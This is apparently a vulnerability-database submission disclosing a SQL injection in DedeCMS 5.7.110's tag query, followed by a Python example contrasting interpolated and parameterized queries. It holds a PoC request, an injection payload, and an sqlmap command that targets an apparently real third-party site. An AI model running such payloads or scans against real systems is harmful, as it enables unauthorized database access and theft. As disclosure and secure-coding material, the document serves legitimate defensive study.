| Title | dedecms sql injection |
|---|
| Description | Website: www.dedecms.com/
Affected version: DedeCMS V5.7.110
Vulnerability description: DedeCMS's tag query interface is vulnerable to SQL injection. It interpolates the variable $tag_alias into the string of a SQL query statement
and does not filter or escape $tag_alias in any way. This allows a malicious user to inject SQL code by constructing specific URL parameters.
Attackers can use this to steal sensitive information, such as the contents of the database.
PoC:
GET /uploads/tags.php?QUERY_STRING=alias/alias/bbb* HTTP/1.1
Host: 127.0.0.1
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1689668702,1689755217,1689908948,1690348034; Hm_lvt_f8cddee34ca21f05373a9388cfdd798b=1691473417
Connection: close
SQLmap:
sqlmap.py -u "http://list.beijingcloud.com.cn/tags.php?QUERY_STRING=alias/alias/bbb*" -dbs --batch
Payload: http://127.0.0.1:80/uploads/tags.php?QUERY_STRING=alias/alias/bbb' AND 8367=8367 AND 'yMwU'='yMwU |
|---|
| Source | ⚠️ https://github.com/laoquanshi/cve |
|---|
| User | heishou (UID 53637) |
|---|
| Submission | 08/30/2023 04:49 (3 years ago) |
|---|
| Moderation | 09/03/2023 09:01 (4 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 238636 [DedeCMS 5.7.110 /uploads/tags.php tag_alias sql injection] |
|---|
| Points | 18 |
|---|
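
Added example, not part of the original submission and not DedeCMS's own code: the string-interpolation flaw described above next to a bound-parameter query, in Python with an in-memory SQLite database standing in for the PHP/MySQL stack. The `tags` table, its columns, the sample rows and the alias allowlist are assumptions; the input is the payload string already quoted on the page.

```python
import re
import sqlite3


def make_db():
    """Constructed sample data; table and column names are assumptions."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tags (id INTEGER PRIMARY KEY, tag_alias TEXT, title TEXT)")
    db.executemany("INSERT INTO tags (tag_alias, title) VALUES (?, ?)",
                   [("bbb", "Tag B"), ("news", "News")])
    return db


def alias_from_query_string(query_string):
    """Extract <value> from the 'alias/alias/<value>' form seen in the PoC request."""
    prefix = "alias/alias/"
    return query_string[len(prefix):] if query_string.startswith(prefix) else None


def lookup_interpolated(db, tag_alias):
    """Vulnerable pattern: the value is pasted into the SQL text itself."""
    sql = "SELECT title FROM tags WHERE tag_alias = '%s'" % tag_alias
    return [row[0] for row in db.execute(sql)]


def lookup_bound(db, tag_alias):
    """Hardened pattern: the value is sent as a bound parameter, never parsed as SQL."""
    sql = "SELECT title FROM tags WHERE tag_alias = ?"
    return [row[0] for row in db.execute(sql, (tag_alias,))]


# Assumed allowlist for aliases; a second layer, not a replacement for binding.
ALIAS_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


def is_valid_alias(tag_alias):
    return tag_alias is not None and ALIAS_RE.fullmatch(tag_alias) is not None


if __name__ == "__main__":
    db = make_db()
    value = alias_from_query_string("alias/alias/bbb' AND 8367=8367 AND 'yMwU'='yMwU")
    # Interpolated: the quote ends the literal, the rest runs as SQL, row 'bbb' matches.
    print("interpolated:", lookup_interpolated(db, value))
    # Bound: the whole string is compared as one alias, so nothing matches.
    print("bound:       ", lookup_bound(db, value))
    print("valid alias: ", is_valid_alias(value))
```

A lone trailing quote (`bbb'`) makes the interpolated query raise a syntax error while the bound query simply returns no rows, which is the same difference seen from the error-log side.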